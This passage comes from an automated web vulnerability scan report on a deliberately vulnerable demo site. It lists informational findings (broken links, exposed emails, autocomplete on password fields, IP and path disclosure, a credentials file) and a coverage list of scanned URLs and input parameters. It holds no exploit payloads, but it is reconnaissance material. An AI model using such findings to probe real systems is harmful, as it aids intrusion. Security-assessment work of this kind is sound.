Severity Informational Type Informational Reported by module Crawler Description A broken link refers to any link that should take you to a document, image or webpage, that actually results in an error. This page was linked from the website but it is inaccessible. Impact Problems navigating the site. Recommendation Remove the links to this file or make it accessible. Affected items /medias/css/main.css Details For a complete list of URLs linking to this file, go to Site Structure > Locate and select the file (marked as "Not Found") > select Referrers Tab from the bottom of the Information pane. Request headers GET /medias/css/main.css HTTP/1.1 Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/pictures/path-disclosure-unix.html Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* /medias/js/common_functions.js Details For a complete list of URLs linking to this file, go to Site Structure > Locate and select the file (marked as "Not Found") > select Referrers Tab from the bottom of the Information pane. Request headers GET /medias/js/common_functions.js HTTP/1.1 Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/pictures/path-disclosure-unix.html Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* /Mod_Rewrite_Shop/Details/color-printer/3 Details For a complete list of URLs linking to this file, go to Site Structure > Locate and select the file (marked as "Not Found") > select Referrers Tab from the bottom of the Information pane. Request headers GET /Mod_Rewrite_Shop/Details/color-printer/3/ HTTP/1.1 Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3 Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate websecurityscan.eu 68

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* /Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1 Details For a complete list of URLs linking to this file, go to Site Structure > Locate and select the file (marked as "Not Found") > select Referrers Tab from the bottom of the Information pane. Request headers GET /Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1/ HTTP/1.1 Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1 Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* /Mod_Rewrite_Shop/Details/web-camera-a4tech/2 Details For a complete list of URLs linking to this file, go to Site Structure > Locate and select the file (marked as "Not Found") > select Referrers Tab from the bottom of the Information pane. Request headers GET /Mod_Rewrite_Shop/Details/web-camera-a4tech/2/ HTTP/1.1 Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2 Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* /privacy.php Details For a complete list of URLs linking to this file, go to Site Structure > Locate and select the file (marked as "Not Found") > select Referrers Tab from the bottom of the Information pane. Request headers GET /privacy.php HTTP/1.1 Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/ Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */*

websecurityscan.eu

69

Email address found


Severity Informational Type Informational Reported by module Scripting (Text_Search_Dir.script) Description One or more email addresses have been found on this page. The majority of spam comes from email addresses harvested off the internet. The spam-bots (also known as email harvesters and email extractors) are programs that scour the internet looking for email addresses on any website they come across. Spambot programs look for strings like myname@mydomain.com and then record any addresses found. Impact Email addresses posted on Web sites may attract spam. Recommendation Check references for details on how to solve this problem. References Email Address Disclosed on Website Can be Used for Spam Affected items / Details Pattern found: wvs@acunetix.com Request headers GET / HTTP/1.1 Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* /artists.php Details Pattern found: wvs@acunetix.com Request headers GET /artists.php HTTP/1.1 Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/ Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* /cart.php Details Pattern found: wvs@acunetix.com Request headers GET /cart.php HTTP/1.1 Pragma: no-cache Cache-Control: no-cache websecurityscan.eu

70

Referer: http://testphp.vulnweb.com/ Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* /categories.php Details Pattern found: wvs@acunetix.com Request headers GET /categories.php HTTP/1.1 Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/ Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* /disclaimer.php Details Pattern found: wvs@acunetix.com Request headers GET /disclaimer.php HTTP/1.1 Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/ Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* /guestbook.php Details Pattern found: wvs@acunetix.com Request headers GET /guestbook.php HTTP/1.1 Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/ Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* /index.bak Details Pattern found: wasp@acunetix.com Request headers GET /index.bak HTTP/1.1 Pragma: no-cache Cache-Control: no-cache websecurityscan.eu 71

Referer: http://testphp.vulnweb.com/index.php Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* /index.php Details Pattern found: wvs@acunetix.com Request headers GET /index.php HTTP/1.1 Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/ Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* /listproducts.php Details Pattern found: wvs@acunetix.com Request headers GET /listproducts.php HTTP/1.1 Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/search.php Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* /login.php Details Pattern found: wvs@acunetix.com Request headers GET /login.php HTTP/1.1 Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/ Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* /product.php Details Pattern found: wvs@acunetix.com Request headers GET /product.php HTTP/1.1 Pragma: no-cache Cache-Control: no-cache websecurityscan.eu 72

Referer: http://testphp.vulnweb.com/search.php Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* /search.php Details Pattern found: wvs@acunetix.com Request headers GET /search.php HTTP/1.1 Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/ Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* /signup.php Details Pattern found: wvs@acunetix.com Request headers GET /signup.php HTTP/1.1 Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/login.php Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* /Templates/main_dynamic_template.dwt.php Details Pattern found: wvs@acunetix.com Request headers GET /Templates/main_dynamic_template.dwt.php HTTP/1.1 Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/ Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */*

websecurityscan.eu

73

GHDB: Sablotron error message


Severity Informational Type Informational Reported by module GHDB Description The description for this alert is contributed by the GHDB community, it may contain inappropriate language. Category : Error Messages Sablotron is an XML toolit thingie. This query hones in on error messages generated by this toolkit. These error messages reveal all sorts of interesting stuff such as source code snippets, path and filename info, etc. The Google Hacking Database (GHDB) appears courtesy of the Google Hacking community. Impact Not available. Check description. Recommendation Not available. Check description. References Acunetix Google hacking The Google Hacking Database (GHDB) community Affected items /pictures/path-disclosure-unix.html Details We found warning "error on line" php sablotron Request headers GET /pictures/path-disclosure-unix.html HTTP/1.1 Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/pictures/ Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */*

websecurityscan.eu

74

Password type input with auto-complete enabled


Severity Informational Type Informational Reported by module Crawler Description When a new name and password is entered in a form and the form is submitted, the browser asks if the password should be saved. Thereafter when the form is displayed, the name and password are filled in automatically or are completed as the name is entered. An attacker with local access could obtain the cleartext password from the browser cache. Impact Possible sensitive information disclosure Recommendation The password auto-complete should be disabled in sensitive applications. To disable auto-complete, you may use a code similar to: <INPUT TYPE="password" AUTOCOMPLETE="off">

Affected items /login.php Details Password type input named pass from form named loginform with action userinfo.php has autocomplete enabled. Request headers GET /login.php HTTP/1.1 Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/ Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* /signup.php Details Password type input named upass2 from form named form1 with action /secured/newuser.php has autocomplete enabled. Request headers GET /signup.php HTTP/1.1 Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/login.php Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* /signup.php Details Password type input named upass from form named form1 with action /secured/newuser.php has autocomplete enabled. Request headers GET /signup.php HTTP/1.1 Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/login.php websecurityscan.eu 75

Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */*

websecurityscan.eu

76

Possible internal IP address disclosure


Severity Informational Type Informational Reported by module Scripting (Text_Search_File.script) Description A string matching an internal IPv4 address was found on this page. This may disclose information about the IP addressing scheme of the internal network. This information can be used to conduct further attacks. This alert may be a false positive, manual confirmation is required. Impact Possible sensitive information disclosure. Recommendation Prevent this information from being displayed to the user. Affected items /pictures/ipaddresses.txt Details Pattern found: 192.168.0.26 Request headers GET /pictures/ipaddresses.txt HTTP/1.1 Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/pictures/ Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */*

websecurityscan.eu

77

Possible server path disclosure (Unix)


Severity Informational Type Informational Reported by module Scripting (Text_Search_File.script) Description One or more fully qualified path names were found on this page. From this information the attacker may learn the file system structure from the web server. This information can be used to conduct further attacks. This alert may be a false positive, manual confirmation is required. Impact Possible sensitive information disclosure. Recommendation Prevent this information from being displayed to the user. Affected items /pictures/path-disclosure-unix.html Details Pattern found: /usr/local/etc/httpd/htdocs2/destination Request headers GET /pictures/path-disclosure-unix.html HTTP/1.1 Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/pictures/ Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */*

websecurityscan.eu

78

Possible username or password disclosure


Severity Informational Type Informational Reported by module Scripting (Text_Search_File.script) Description A username and/or password was found in this file. This information could be sensitive. This alert may be a false positive, manual confirmation is required. Impact Possible sensitive information disclosure. Recommendation Remove this file from your website or change its permissions to remove access. Affected items /pictures/credentials.txt Details Pattern found: password=something Request headers GET /pictures/credentials.txt HTTP/1.1 Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/pictures/ Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */*

websecurityscan.eu

79

Scanned items (coverage report)


Scanned 89 URLs. Found 45 vulnerable. URL: http://testphp.vulnweb.com/ Vulnerabilities has been identified for this URL No input(s) found for this URL URL: http://testphp.vulnweb.com/search.php Vulnerabilities has been identified for this URL 3 input(s) found for this URL Inputs Input scheme 1 Input name test goButton searchFor URL: http://testphp.vulnweb.com/hpp/ Vulnerabilities has been identified for this URL 1 input(s) found for this URL Inputs Input scheme 1 Input name pp URL: http://testphp.vulnweb.com/hpp/params.php Vulnerabilities has been identified for this URL 3 input(s) found for this URL Inputs Input scheme 1 Input name aaaa/ Input scheme 2 Input name p pp URL: http://testphp.vulnweb.com/hpp/test.php No vulnerabilities has been identified for this URL No input(s) found for this URL URL: http://testphp.vulnweb.com/cart.php Vulnerabilities has been identified for this URL 2 input(s) found for this URL Inputs Input scheme 1 Input name addcart price URL: http://testphp.vulnweb.com/index.php Vulnerabilities has been identified for this URL No input(s) found for this URL Input type URL encoded POST URL encoded POST Input type URL encoded GET Input type URL encoded GET URL encoded GET Input type URL encoded GET Input type URL encoded GET URL encoded POST URL encoded POST

websecurityscan.eu

80

URL: http://testphp.vulnweb.com/login.php Vulnerabilities has been identified for this URL No input(s) found for this URL URL: http://testphp.vulnweb.com/style.css No vulnerabilities has been identified for this URL No input(s) found for this URL URL: http://testphp.vulnweb.com/artists.php Vulnerabilities has been identified for this URL 1 input(s) found for this URL Inputs Input scheme 1 Input name artist URL: http://testphp.vulnweb.com/privacy.php Vulnerabilities has been identified for this URL No input(s) found for this URL URL: http://testphp.vulnweb.com/userinfo.php Vulnerabilities has been identified for this URL 2 input(s) found for this URL Inputs Input scheme 1 Input name pass uname URL: http://testphp.vulnweb.com/guestbook.php Vulnerabilities has been identified for this URL 3 input(s) found for this URL Inputs Input scheme 1 Input name name submit text URL: http://testphp.vulnweb.com/categories.php Vulnerabilities has been identified for this URL No input(s) found for this URL URL: http://testphp.vulnweb.com/Flash/ Vulnerabilities has been identified for this URL No input(s) found for this URL URL: http://testphp.vulnweb.com/Flash/add.swf No vulnerabilities has been identified for this URL No input(s) found for this URL URL: http://testphp.vulnweb.com/Flash/add.fla No vulnerabilities has been identified for this URL No input(s) found for this URL URL: http://testphp.vulnweb.com/AJAX/ No vulnerabilities has been identified for this URL No input(s) found for this URL websecurityscan.eu 81 Input type URL encoded POST URL encoded POST URL encoded POST Input type URL encoded POST URL encoded POST Input type URL encoded GET

URL: http://testphp.vulnweb.com/AJAX/index.php No vulnerabilities has been identified for this URL No input(s) found for this URL URL: http://testphp.vulnweb.com/AJAX/styles.css No vulnerabilities has been identified for this URL No input(s) found for this URL URL: http://testphp.vulnweb.com/AJAX/artists.php No vulnerabilities has been identified for this URL No input(s) found for this URL URL: http://testphp.vulnweb.com/AJAX/infoartist.php?id=1 Vulnerabilities has been identified for this URL 1 input(s) found for this URL Inputs Input scheme 1 Input name id URL: http://testphp.vulnweb.com/AJAX/categories.php No vulnerabilities has been identified for this URL No input(s) found for this URL URL: http://testphp.vulnweb.com/AJAX/infocateg.php?id=1 Vulnerabilities has been identified for this URL 1 input(s) found for this URL Inputs Input scheme 1 Input name id URL: http://testphp.vulnweb.com/AJAX/titles.php No vulnerabilities has been identified for this URL No input(s) found for this URL URL: http://testphp.vulnweb.com/AJAX/infotitle.php Vulnerabilities has been identified for this URL 1 input(s) found for this URL Inputs Input scheme 1 Input name id URL: http://testphp.vulnweb.com/AJAX/showxml.php No vulnerabilities has been identified for this URL 1 input(s) found for this URL Inputs Input scheme 1 Input name text/xml URL: http://testphp.vulnweb.com/disclaimer.php Vulnerabilities has been identified for this URL No input(s) found for this URL Input type Custom POST Input type URL encoded POST Input type URL encoded GET Input type URL encoded GET

websecurityscan.eu

82

URL: http://testphp.vulnweb.com/images/ Vulnerabilities has been identified for this URL No input(s) found for this URL URL: http://testphp.vulnweb.com/Mod_Rewrite_Shop/ Vulnerabilities has been identified for this URL No input(s) found for this URL URL: http://testphp.vulnweb.com/Mod_Rewrite_Shop/images/ Vulnerabilities has been identified for this URL No input(s) found for this URL URL: http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details No vulnerabilities has been identified for this URL No input(s) found for this URL URL: http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer No vulnerabilities has been identified for this URL No input(s) found for this URL URL: http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3/ Vulnerabilities has been identified for this URL No input(s) found for this URL URL: http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech No vulnerabilities has been identified for this URL No input(s) found for this URL URL: http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2/ Vulnerabilities has been identified for this URL No input(s) found for this URL URL: http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink No vulnerabilities has been identified for this URL No input(s) found for this URL URL: http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1/ Vulnerabilities has been identified for this URL No input(s) found for this URL URL: http://testphp.vulnweb.com/Mod_Rewrite_Shop/.htaccess No vulnerabilities has been identified for this URL No input(s) found for this URL URL: http://testphp.vulnweb.com/product.php Vulnerabilities has been identified for this URL 1 input(s) found for this URL Inputs Input scheme 1 Input name pic URL: http://testphp.vulnweb.com/showimage.php Vulnerabilities has been identified for this URL 3 input(s) found for this URL Inputs Input scheme 1 Input name file size websecurityscan.eu Input type URL encoded GET URL encoded GET 83 Input type URL encoded GET

Input scheme 2 Input name file URL: http://testphp.vulnweb.com/listproducts.php Vulnerabilities has been identified for this URL 2 input(s) found for this URL Inputs Input scheme 1 Input name cat Input scheme 2 Input name artist URL: http://testphp.vulnweb.com/signup.php Vulnerabilities has been identified for this URL No input(s) found for this URL URL: http://testphp.vulnweb.com/redir.php Vulnerabilities has been identified for this URL 1 input(s) found for this URL Inputs Input scheme 1 Input name r URL: http://testphp.vulnweb.com/Templates/ Vulnerabilities has been identified for this URL No input(s) found for this URL URL: http://testphp.vulnweb.com/Templates/main_dynamic_template.dwt.php Vulnerabilities has been identified for this URL No input(s) found for this URL URL: http://testphp.vulnweb.com/crossdomain.xml No vulnerabilities has been identified for this URL No input(s) found for this URL URL: http://testphp.vulnweb.com/secured/ Vulnerabilities has been identified for this URL No input(s) found for this URL URL: http://testphp.vulnweb.com/secured/newuser.php Vulnerabilities has been identified for this URL 9 input(s) found for this URL Inputs Input scheme 1 Input name signup uaddress ucc uemail upass upass2 uphone urname websecurityscan.eu

Input type URL encoded GET

Input type URL encoded GET Input type URL encoded GET

Input type URL encoded GET

Input type URL encoded POST URL encoded POST URL encoded POST URL encoded POST URL encoded POST URL encoded POST URL encoded POST URL encoded POST 84

uuname URL: http://testphp.vulnweb.com/secured/style.css No vulnerabilities has been identified for this URL No input(s) found for this URL URL: http://testphp.vulnweb.com/comment.php Vulnerabilities has been identified for this URL 6 input(s) found for this URL Inputs Input scheme 1 Input name aid Input scheme 2 Input name pid Input scheme 3 Input name comment name phpaction Submit URL: http://testphp.vulnweb.com/pictures/ Vulnerabilities has been identified for this URL No input(s) found for this URL URL: http://testphp.vulnweb.com/pictures/8.jpg.tn No vulnerabilities has been identified for this URL No input(s) found for this URL URL: http://testphp.vulnweb.com/pictures/1.jpg.tn No vulnerabilities has been identified for this URL No input(s) found for this URL URL: http://testphp.vulnweb.com/pictures/7.jpg.tn No vulnerabilities has been identified for this URL No input(s) found for this URL URL: http://testphp.vulnweb.com/pictures/6.jpg.tn No vulnerabilities has been identified for this URL No input(s) found for this URL URL: http://testphp.vulnweb.com/pictures/4.jpg.tn No vulnerabilities has been identified for this URL No input(s) found for this URL URL: http://testphp.vulnweb.com/pictures/3.jpg.tn No vulnerabilities has been identified for this URL No input(s) found for this URL URL: http://testphp.vulnweb.com/pictures/5.jpg.tn No vulnerabilities has been identified for this URL No input(s) found for this URL URL: http://testphp.vulnweb.com/pictures/2.jpg.tn No vulnerabilities has been identified for this URL No input(s) found for this URL

URL encoded POST

Input type URL encoded GET Input type URL encoded GET Input type URL encoded POST URL encoded POST URL encoded POST URL encoded POST

websecurityscan.eu

85

URL: http://testphp.vulnweb.com/pictures/WS_FTP.LOG No vulnerabilities has been identified for this URL No input(s) found for this URL URL: http://testphp.vulnweb.com/pictures/wp-config.bak Vulnerabilities has been identified for this URL No input(s) found for this URL URL: http://testphp.vulnweb.com/pictures/ipaddresses.txt Vulnerabilities has been identified for this URL No input(s) found for this URL URL: http://testphp.vulnweb.com/pictures/credentials.txt Vulnerabilities has been identified for this URL No input(s) found for this URL URL: http://testphp.vulnweb.com/pictures/path-disclosure-win.html No vulnerabilities has been identified for this URL No input(s) found for this URL URL: http://testphp.vulnweb.com/pictures/path-disclosure-unix.html Vulnerabilities has been identified for this URL No input(s) found for this URL URL: http://testphp.vulnweb.com/index.bak Vulnerabilities has been identified for this URL No input(s) found for this URL URL: http://testphp.vulnweb.com/.idea/ Vulnerabilities has been identified for this URL No input(s) found for this URL URL: http://testphp.vulnweb.com/.idea/workspace.xml No vulnerabilities has been identified for this URL No input(s) found for this URL URL: http://testphp.vulnweb.com/.idea/vcs.xml No vulnerabilities has been identified for this URL No input(s) found for this URL URL: http://testphp.vulnweb.com/.idea/scopes/ Vulnerabilities has been identified for this URL No input(s) found for this URL URL: http://testphp.vulnweb.com/.idea/scopes/scope_settings.xml No vulnerabilities has been identified for this URL No input(s) found for this URL URL: http://testphp.vulnweb.com/.idea/acuart.iml No vulnerabilities has been identified for this URL No input(s) found for this URL URL: http://testphp.vulnweb.com/.idea/misc.xml No vulnerabilities has been identified for this URL No input(s) found for this URL URL: http://testphp.vulnweb.com/.idea/modules.xml No vulnerabilities has been identified for this URL No input(s) found for this URL

websecurityscan.eu

86

URL: http://testphp.vulnweb.com/.idea/encodings.xml No vulnerabilities has been identified for this URL No input(s) found for this URL URL: http://testphp.vulnweb.com/admin/ Vulnerabilities has been identified for this URL No input(s) found for this URL URL: http://testphp.vulnweb.com/admin/create.sql No vulnerabilities has been identified for this URL No input(s) found for this URL URL: http://testphp.vulnweb.com/CVS/ Vulnerabilities has been identified for this URL No input(s) found for this URL URL: http://testphp.vulnweb.com/CVS/Root No vulnerabilities has been identified for this URL No input(s) found for this URL URL: http://testphp.vulnweb.com/CVS/Entries No vulnerabilities has been identified for this URL No input(s) found for this URL URL: http://testphp.vulnweb.com/CVS/Repository No vulnerabilities has been identified for this URL No input(s) found for this URL URL: http://testphp.vulnweb.com/CVS/Entries.Log No vulnerabilities has been identified for this URL No input(s) found for this URL URL: http://testphp.vulnweb.com/medias No vulnerabilities has been identified for this URL No input(s) found for this URL URL: http://testphp.vulnweb.com/medias/img No vulnerabilities has been identified for this URL No input(s) found for this URL URL: http://testphp.vulnweb.com/medias/css No vulnerabilities has been identified for this URL No input(s) found for this URL URL: http://testphp.vulnweb.com/medias/css/main.css Vulnerabilities has been identified for this URL No input(s) found for this URL URL: http://testphp.vulnweb.com/medias/js No vulnerabilities has been identified for this URL No input(s) found for this URL URL: http://testphp.vulnweb.com/medias/js/common_functions.js Vulnerabilities has been identified for this URL No input(s) found for this URL

websecurityscan.eu

87

You might also like